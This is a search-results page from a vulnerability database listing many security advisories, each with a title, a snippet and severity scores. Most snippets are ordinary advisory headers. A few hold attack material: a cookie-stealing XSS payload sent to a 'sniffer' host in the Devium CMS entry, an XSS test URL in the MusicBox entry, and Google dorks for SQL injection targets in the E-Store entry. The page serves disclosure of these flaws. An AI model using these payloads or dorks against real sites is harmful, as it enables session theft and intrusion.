Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2009/10/13 12:0 a.m.97 views

Microsoft Security Bulletin MS09-053 - Important Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)

Microsoft Security Bulletin MS09-053 - Important Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution 975254 Published: October 13, 2009 Version: 1.0 General Information Executive Summary This security update resolves two publicly disclosed...

9.3CVSS0.4AI score0.90913EPSS
Exploits20
securityvulns
securityvulns
added 2009/06/29 12:0 a.m.97 views

osTicket v1.6 RC4 Admin Login Blind SQLi

nGenuity Information Services - Security Advisory Advisory ID: NGENUITY-2009-007 osTicket Admin Login Blind SQL Injection Application: osTicket v1.6 RC4 Vendor: osTicket Vendor website: http://www.osticket.com Author: Adam Baldwin [email protected] I. BACKGROUND "osTicket is a widely-us...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2009/06/29 12:0 a.m.97 views

[Full-disclosure] [ GLSA 200906-02 ] Ruby: Denial of Service

Gentoo Linux Security Advisory GLSA 200906-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity:...

5CVSS9AI score0.08375EPSS
Exploits2
securityvulns
securityvulns
added 2009/02/12 12:0 a.m.97 views

[Suspected Spam][Fwd: Re: Novell-QuickFinder Server Xss & Java remote execution Code]

NULL CODE SERVICES www.nullcode.com.ar Hunting Security Bugs! +================================================================================================================================+ + Novell-QuickFinder Server //Cross-site scripting XSS Remote Java Execution Code +...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2009/01/16 12:0 a.m.97 views

[waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1

waraxe-2009-SA070 - Multiple Vulnerabilities in MKPortal = 1.2.1 ============================================================================== Author: Janek Vind "waraxe" Date: 15. January 2009 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-70.html Description of vulnerable software...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2008/10/14 12:0 a.m.97 views

Telecom Italia Alice Pirelli routers backdoor discoverd to activate telnet/ftp/tftp from internal LAN/WLAN.

saxdax & drpepperONE Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin interface with Admin privileges, from internal network lan on Alice ADSL CPE Modem/Router, manufactered by Pirelli based on Broadcom platform. saxdax & drpepperONE Router Vendor: Alice Telecom Italia...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2008/09/29 12:0 a.m.97 views

Mozilla Foundation Security Advisory 2008-44

Mozilla Foundation Security Advisory 2008-44 Title: resource: traversal vulnerabilities Impact: Moderate Announced: September 23, 2008 Reporter: Boris Zbarsky, Georgi Guninski Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 3.0.2 Firefox 2.0.0.17 Thunderbird 2.0.0.17 SeaMonkey 1.1.12...

7.8CVSS1.1AI score0.04438EPSS
Exploits2
securityvulns
securityvulns
added 2008/09/13 12:0 a.m.97 views

[SECURITY] [DSA 1636-1] New Linux 2.6.24 packages fix several vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- Debian Security Advisory DSA-1636-1 [email protected] http://www.debian.org/security/ dann frazier Sep 11, 2008 http://www.debian.org/security/faq -...

9.3CVSS1.5AI score0.04353EPSS
Exploits12
securityvulns
securityvulns
added 2008/07/12 12:0 a.m.97 views

Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks Advisory ID: cisco-sa-20080708-dns http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml Revision 1.0 For Public Release 2008 July 08 1800 UTC GMT...

5CVSS0.4AI score0.95182EPSS
Exploits20
securityvulns
securityvulns
added 2008/06/05 12:0 a.m.97 views

VMSA-2008-0009 Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 - ------------------------------------------------------------------- VMware Security Advisory Advisory ID: VMSA-2008-0009 Synopsis: Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX,...

9.3CVSS10AI score0.10141EPSS
Exploits4
securityvulns
securityvulns
added 2007/09/13 12:0 a.m.97 views

Apache2 Undefined Charset UTF-7 XSS Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Apache2 Undefined Charset UTF-7 XSS Vulnerability Author: SecurityReason Maksymilian Arciemowicz cXIb8O3 Date: - - Written: 08.08.2007 - - Public: 11.09.2007 SecurityReason Research SecurityAlert Id: 46 CVE: CVE-2007-4465 SecurityRisk: Low Affected...

4.3CVSS7.5AI score0.26188EPSS
Exploits0
securityvulns
securityvulns
added 2007/07/05 12:0 a.m.97 views

Redirection Vulnerability in wp-pass.php, WordPress 2.2.1

The vulnerability found could allow an attacker to redirect victims to an arbitrary 3rd party site. This site could be a phishing site or contain malware allowing the attacker to steal account credentials or compromise hosts. This vulnerability can be found in Wordpress 2.2, however it is likely...

1AI score
Exploits0
securityvulns
securityvulns
added 2007/04/20 12:0 a.m.97 views

NeatUpload vulnerability and fix

Product: NeatUpload Synopsis: A race condition in several versions of the NeatUpload ASP.NET component could sometimes cause portions of responses to be sent to the wrong user, potentially revealing sensitive information to unauthorized users. Vulnerable versions: 1.2.11-1.2.16, 1.1.18-1.1.23, an...

6.8AI score
Exploits0
securityvulns
securityvulns
added 2007/01/30 12:0 a.m.97 views

CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability

Title : CascadianFAQ = 4.1 index.php Remote Blind SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://eclectic-designs.com $$ : Free Dork : This FAQ is powered by CascadianFAQ DorkEx :...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2006/10/26 12:0 a.m.97 views

Multiple HTTP response splitting vulnerabilities in SHOP-SCRIPT

Vendor: Shop-Script a division of WebAsyst LLC Application: Shop-Script www.shop-script.com I. Descriptions: Shop-Script is a PHP based shopping cart. Multiple links of shop-script are vulnerable to a new form of application attack technique called HTTP Response splitting aka CRLF Injection. HTTP...

6.9AI score
Exploits0
securityvulns
securityvulns
added 2006/07/25 12:0 a.m.97 views

MusicBox <= 2.3.4 XSS SQL injection Vulnerability

MusicBox 2.3.4 http://www.musicboxv2.com ------------ PHPinfo page ------------ /phpinfo.php -------------------------- Cross Site Scripting XSS -------------------------- http://www.target.xx/?id=scriptalert/EllipsisSecurityTest//script&page=0...

6.8AI score
Exploits0
securityvulns
securityvulns
added 2006/07/25 12:0 a.m.97 views

XSS в Devium CMS 1.5

Advisory: XSS в Devium CMS 1.5 Home Page: http://www.devium.net/ Уязвимость/Vulnerability: XSS в гостевой книге. Exploit: scriptimg = new Image; img.src = "http://sniffer/a.jpg?"+document.cookie;/script Уязвимость/Vulnerability: Раскрытие установочного пути в админке:...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2006/06/13 12:0 a.m.97 views

Microsoft Security Bulletin MS06-021

Microsoft Security Bulletin MS06-021 Cumulative Security Update for Internet Explorer 916281 Published: June 13, 2006 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Windows Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Critical...

10CVSS0.5AI score0.48569EPSS
Exploits4
securityvulns
securityvulns
added 2005/04/13 12:0 a.m.97 views

Microsoft Security Bulletin MS05-018 Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service (890859)

Microsoft Security Bulletin MS05-018 Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service 890859 Issued: April 12, 2005 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Windows Impact of Vulnerability: Elevation of Privilege...

10CVSS0.8AI score0.21533EPSS
Exploits0
securityvulns
securityvulns
added 2002/08/25 12:0 a.m.97 views

Blazix 1.2 jsp view and free protected folder access

Auriemma Luigi, PivX security advisory Application: Blazix http://www.blazix.com Version: 1.2 and previous Bug: Bad management of files requested with at the end some "bad" characters Risk low: An attacker can view jsp and other server side scripts with the ability to access any password protecte...

7.3AI score
Exploits0
securityvulns
securityvulns
added 2001/10/12 12:0 a.m.97 views

Security Update: [CSSA-2001-SCO.25] OpenServer: various scoadmin/sysadm subprograms have buffer overflows

To: [email protected] [email protected] [email protected] [email protected] Do not reply to this mail. This security advisory is being sent from a nonexistent address in order to avoid spam problems. Caldera's contact address for UNIX security issue...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2001/06/07 12:0 a.m.97 views

Security Bulletin MS01-030

Title: Incorrect Attachment Handling in Exchange 2000 OWA Can Execute Script Date: 06 June 2001 Software: Microsoft Exchange 2000 Server Outlook Web Access Impact: Run code of attacker's choice Bulletin: MS01-030 Microsoft encourages customers to review the Security Bulletin at:...

1.5AI score
Exploits0
securityvulns
securityvulns
added 2000/12/06 12:0 a.m.97 views

Serv-U FTP directory traversal vunerability (all versions)

===================================================================== Securax-SA-09 Security Advisory belgian.networking.security Dutch ===================================================================== Topic: Catsoft serv-U FTP Directory Transversal Vulnerability Announced: 2000-12-03 Updated...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2015/08/02 12:0 a.m.96 views

[USN-2694-1] PCRE vulnerabilities

========================================================================== Ubuntu Security Notice USN-2694-1 July 29, 2015 pcre3 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

7.5CVSS1.1AI score0.09157EPSS
Exploits4
securityvulns
securityvulns
added 2015/06/21 12:0 a.m.96 views

[SECURITY] [DSA 3291-1] drupal7 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3291-1 [email protected] https://www.debian.org/security/ Sebastien Delafond June 18, 2015 https://www.debian.org/security/faq -...

5.8CVSS1.1AI score0.02763EPSS
Exploits0
securityvulns
securityvulns
added 2015/06/14 12:0 a.m.96 views

XSS vulnerability Adobe Connect 9.3 (CVE-2015-0343 )

Advisory: Adobe Connect Reflected XSS Author: Stas Volfus Bugsec Information Security LTD Vendor URL: http://www.adobe.com/ Status: Vendor Notified ========================== Vulnerability Description ========================== Adobe Connect Central version: 9.3 is vulnerable to Reflected XSS Cro...

4.3CVSS0.1AI score0.03194EPSS
Exploits1
securityvulns
securityvulns
added 2015/06/08 12:0 a.m.96 views

[SECURITY] [DSA 3276-1] symfony security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3276-1 [email protected] http://www.debian.org/security/ David Prevot May 31, 2015 http://www.debian.org/security/faq -...

4.3CVSS1.3AI score0.08269EPSS
Exploits0
securityvulns
securityvulns
added 2015/05/05 12:0 a.m.96 views

[slackware-security] proftpd (SSA:2015-111-12)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 slackware-security proftpd SSA:2015-111-12 New proftpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+...

10CVSS8.5AI score0.96803EPSS
Exploits21
securityvulns
securityvulns
added 2014/12/11 12:0 a.m.96 views

Asterisk DoS

WebSocket Server request parsing DoS...

3AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2014/11/10 12:0 a.m.96 views

CVE-2014-6617 Softing FG-100 Backdoor Account

COMPASS SECURITY ADVISORY http://www.csnc.ch/en/downloads/advisories.html Product: Softing FG-100 PB Vendor: Softing AG www.softing.com CVD ID: CVE-2014-6617 Subject: Backdoor Account Risk: High Effect: Remotely exploitable Author: Ingmar Rosenhagen Daniel Marzin Johannes Klick Date: 05.11.2014...

10CVSS9.4AI score0.04543EPSS
Exploits2
securityvulns
securityvulns
added 2014/11/03 12:0 a.m.96 views

[ MDVSA-2014:200 ] bugzilla

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:200 http://www.mandriva.com/en/support/security/ Package : bugzilla Date : October 21, 2014 Affected: Business Server 1.0 Problem Description: Updated bugzilla packages fix security vulnerabilities: If a new...

5CVSS6.2AI score0.02326EPSS
Exploits0
securityvulns
securityvulns
added 2014/10/14 12:0 a.m.96 views

[Onapsis Security Advisory 2014-027] SAP HANA Multiple Reflected Cross Site Scripting Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Onapsis Security Advisory 2014-027: SAP HANA Multiple Reflected Cross Site Scripting Vulnerabilities 1. Impact on Business ===================== By exploiting this vulnerability a remote unauthenticated attacker would be able to attack other users of...

6.4AI score
Exploits0
securityvulns
securityvulns
added 2014/10/14 12:0 a.m.96 views

CVE-2014-4958: Stored Attribute-Based Cross-Site Scripting (XSS) Vulnerability in Telerik UI for ASP.NET AJAX RadEditor Control

All versions of the popular UI for ASP.NET AJAX RadEditor Control product by Telerik may be affected by a high-risk stored attribute-based cross-site scripting XSS vulnerability that is assigned CVE-2014-4958. This WYSIWYG rich text editor is “...what Microsoft chose to use in MSDN, CodePlex,...

4.3CVSS8.8AI score0.01979EPSS
Exploits0
securityvulns
securityvulns
added 2014/08/18 12:0 a.m.96 views

CVE-2014-3577: Apache HttpComponents client: Hostname verification susceptible to MITM attack

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Security Advisory - Apache Software Foundation Apache HttpComponents / hc.apache.org Hostname verification susceptible to MITM attack CVE-2014-3577 / CVSS 1.4 Apache HttpComponents prior to revision 4.3.5/4.0.2 may be susceptible to a 'Man in the Midd...

5.8CVSS6.3AI score0.09149EPSS
Exploits1
securityvulns
securityvulns
added 2014/07/14 12:0 a.m.96 views

python security vulnerabilities

json information leak, CGIHTTPServer unauthroized files access and code execution, lz4 integer overflow...

4.3CVSS3.1AI score0.24148EPSS
Exploits6References3Affected Software1
securityvulns
securityvulns
added 2014/06/26 12:0 a.m.96 views

CVE-2014-2385 - Multiple Cross Site Scripting in Sophos Antivirus Configuration Console (Linux)

Vulnerability title: Multiple Cross Site Scripting in Sophos Antivirus Configuration Console Linux CVE: CVE-2014-2385 Vendor: Sophos Product: Antivirus Affected version: 9.5.1 Fixed version: 9.6.1 Reported by: Pablo Catalina Details: The Configuration Console of Sophos Antivirus 9.5.1 Linux does...

4.3CVSS6.1AI score0.04464EPSS
Exploits1
securityvulns
securityvulns
added 2014/06/14 12:0 a.m.96 views

[ MDVSA-2014:114 ] squid

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:114 http://www.mandriva.com/en/support/security/ Package : squid Date : June 10, 2014 Affected: Business Server 1.0 Problem Description: Updated squid packages fix security vulnerability: Due to incorrect...

5CVSS8.5AI score0.3263EPSS
Exploits1
securityvulns
securityvulns
added 2014/05/05 12:0 a.m.96 views

E-Store (1.0 & 2.0) <= SQL Injection Vulnerability

Exploit Author: Nawaf Alkeraithe ====================================== for "E-store 1.0": Google Dork: "Powered by: PD" inurl:"page.php?id" Vulnerable page: http://target/page.php?id=SQL Injection ====================================== for "E-store 2.0": Google Dork: "Powered by: PD"...

1.8AI score
Exploits0
securityvulns
securityvulns
added 2014/03/13 12:0 a.m.96 views

APPLE-SA-2014-03-10-1 iOS 7.1

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-03-10-1 iOS 7.1 iOS 7.1 is now available and addresses the following: Backup Available for: iPhone 4 and later, iPod touch 5th generation and later, iPad 2 and later Impact: A maliciously crafted backup can alter the filesystem...

8.8CVSS0.1AI score0.10117EPSS
Exploits13
securityvulns
securityvulns
added 2014/02/11 12:0 a.m.96 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

9.3CVSS1.6AI score0.42895EPSS
Exploits32References11Affected Software11
securityvulns
securityvulns
added 2013/12/01 12:0 a.m.96 views

[USN-2035-1] Ruby vulnerabilities

========================================================================== Ubuntu Security Notice USN-2035-1 November 27, 2013 ruby1.8, ruby1.9.1 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its...

6.8CVSS0.6AI score0.34968EPSS
Exploits4
securityvulns
securityvulns
added 2013/10/28 12:0 a.m.96 views

Cisco Identity Services Engine multiple security vulnerabilities

Authentication bypass, code execution...

9.3CVSS3.3AI score0.99998EPSS
Exploits18Affected Software1
securityvulns
securityvulns
added 2013/06/05 12:0 a.m.96 views

[security bulletin] HPSBMU02883 SSRT101227 rev.1 - HP Data Protector, Remote Increase of Privilege, Denial of Service (DoS), Execution of Arbitrary Code

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03781657 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03781657 Version: 1 HPSBMU02883...

10CVSS1.3AI score0.90162EPSS
Exploits12
securityvulns
securityvulns
added 2013/04/22 12:0 a.m.96 views

[USN-1801-1] curl vulnerability

========================================================================== Ubuntu Security Notice USN-1801-1 April 16, 2013 curl vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu...

5CVSS0.4AI score0.04986EPSS
Exploits1
securityvulns
securityvulns
added 2013/04/02 12:0 a.m.96 views

[USN-1787-1] Linux kernel vulnerabilities

========================================================================== Ubuntu Security Notice USN-1787-1 April 02, 2013 linux vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

6.2CVSS6.2AI score0.005EPSS
Exploits2
securityvulns
securityvulns
added 2013/04/01 12:0 a.m.96 views

Multiple XSS vulnerabilities in IBM Lotus Domino

Hello 3APA3A! I want to warn you about multiple Cross-Site Scripting vulnerabilities in IBM Lotus Domino. Last year I've announced multiple vulnerabilities in IBM software and after IBM fixed many of them, I've disclosed them. These are new vulnerabilities in Domino, which I've found at 03.05.201...

4.3CVSS0.7AI score0.01148EPSS
Exploits3
securityvulns
securityvulns
added 2013/02/11 12:0 a.m.96 views

[SECURITY] [DSA 2616-1] nagios3 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2616-1 [email protected] http://www.debian.org/security/ Jonathan Wiltshire February 03, 2013 http://www.debian.org/security/faq -...

7.5CVSS1.5AI score0.6645EPSS
Exploits15
securityvulns
securityvulns
added 2013/01/14 12:0 a.m.96 views

US-CERT Alert TA13-010A - Oracle Java 7 Security Manager Bypass Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Awareness System US-CERT Alert TA13-010A Oracle Java 7 Security Manager Bypass Vulnerability Original release date: January 10, 2013 Last revised: -- Systems Affected Any system using Oracle Java 7 1.7, 1.7.0 including Java Platform...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2012/12/02 12:0 a.m.96 views

[SECURITY] [DSA 2579-1] apache2 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2579-1 [email protected] http://www.debian.org/security/ Stefan Fritsch November 30, 2012 http://www.debian.org/security/faq -...

5CVSS1.1AI score0.1747EPSS
Exploits3
securityvulns
securityvulns
added 2012/10/05 12:0 a.m.96 views

[USN-1595-1] libxslt vulnerabilities

========================================================================== Ubuntu Security Notice USN-1595-1 October 04, 2012 libxslt vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

6.8CVSS1AI score0.02455EPSS
Exploits1
Total number of security vulnerabilities5000